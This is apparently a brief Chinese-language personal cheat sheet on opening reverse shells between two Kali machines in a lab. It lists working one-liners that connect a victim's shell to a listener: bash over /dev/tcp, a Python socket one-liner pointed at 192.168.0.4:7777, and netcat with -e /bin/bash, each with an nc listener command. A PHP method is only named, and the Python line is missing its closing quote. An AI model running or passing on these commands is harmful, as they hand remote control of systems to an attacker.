实验环境:
两台kali
方法一:
bash -i >& /dev/tcp/ip/port 0>&1
nc -lvvp port
方法二
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
nc -lvvp port
方法三
nc -e /bin/bash ip port
nc -lvvp port
方法四:
利用php函数执行反弹shell(有待更新,这个操作确实很骚)
优秀总结文章: